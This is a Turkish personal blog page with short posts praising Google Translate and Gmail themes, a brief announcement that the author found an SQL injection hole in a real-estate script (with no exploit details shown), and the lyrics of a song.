Yardımını esirgemediği için BLaSTER kardeşime teşekkürler ;)

1 Google Translator

Google'ye olan hayranlığım gün geçtikçe büyüyor :) Şimdide web sayfalarını yada bir metni kolayca istediğimiz dile çevirebilmemizi sağlayan bir hizmetle karşımızda...

Buradan sizde istediğiniz siteyi yada metni çevirebilirsiniz.Türkçeye çevirirken bazı eksiklikleri olsada yinede güzel bir fonksiyon...

Teşekkürler Google™

1 Gmail'e Renk Katın!

Bu akşam gmail'de gelen kutuma bakmak yerine biraz gmail'i keşfetmeye çalıştım...Temalar sekmesine geldiğimde birçok temanın eklendiğini gördüm gerçekten çok hoş temalar var ben çok beğendim :)

Gmail kullandığım için birkez daha kendimden gurur duyuyorum =)

İşte birkaç ekran görüntüsü:

En çok beğendiğim ve kullandığım tema...

Benim tercihim görüldüğü üzere siyah ağırlıklı temalar sizlerde kendi zevkinize göre Gmail kontrol panelinizden Ayarlar > Temalar kısmından istediğiniz temayı seçebilirsiniz...

3 Webfırsat Emlak Yazılımı v1.0 SQL Injection Vulnerability

Rastgele bulduğum 200 liralık bir script pehh =) Sanırım pek kullanıcısıda yok...

Açığı görmek için buraya tıklayınız.

0 Kal Bi Sigara İçimlik Daha...

Gözlerini çekip alma benden
Bi kenarda dururum rahatsız etmem
Sözlerin susmasın aman ha
Gizli öznen olurum kötü söylesede cümlen
Gel sevdiğin yemeği ısıttım
Yendikçe çıkar ayrılığın tadı
Nasıl acı nasıl tatsız allah
Sarhoşluğunun aşk olmuş adı
Çekiyor gönül tepene ağla allah
Sarhoşluğunun aşk olmuş adı
Bayramlıklarını giymiş cocuklar gibiyim
Kabıma sığmadım ezbere aldım düş kırıklıklarımı
Kaç acı varsa kalbime sapladığım
Adınla başlıyor senle başlıyor buruk hikayelerim
İhtiraslarımı gülüşlerimi al sonradan duyulan pişmanlığını al
Kolaysa gelde beni senden al
Belki acırda gitmezsin
Masumiyetimi esaretimi al varlığın koyarsa
Hayatımı al kal bi sigara içimlik daha kal
Belki ozaman gitmezsin...
Güzeldik senle bendik...
Biz olmazsakta güzeldik yanyana...
Sen şimdi iste tüm zaferler senin olsun...
Tebrikler olsun gidişine ve
Teşekürler varsa verdiklerine...
Ama avcumda dünya ile gelmiştim
Görmedin ki...
Hiçbir şey vermemek için hiçbir şey almadın ki...
Çocukluğumu sundum sana yüzümde bayramlık sevinci
Bi sigara içimlik kalmadın ki..

Çağrı-Bi Sigara İçimlik...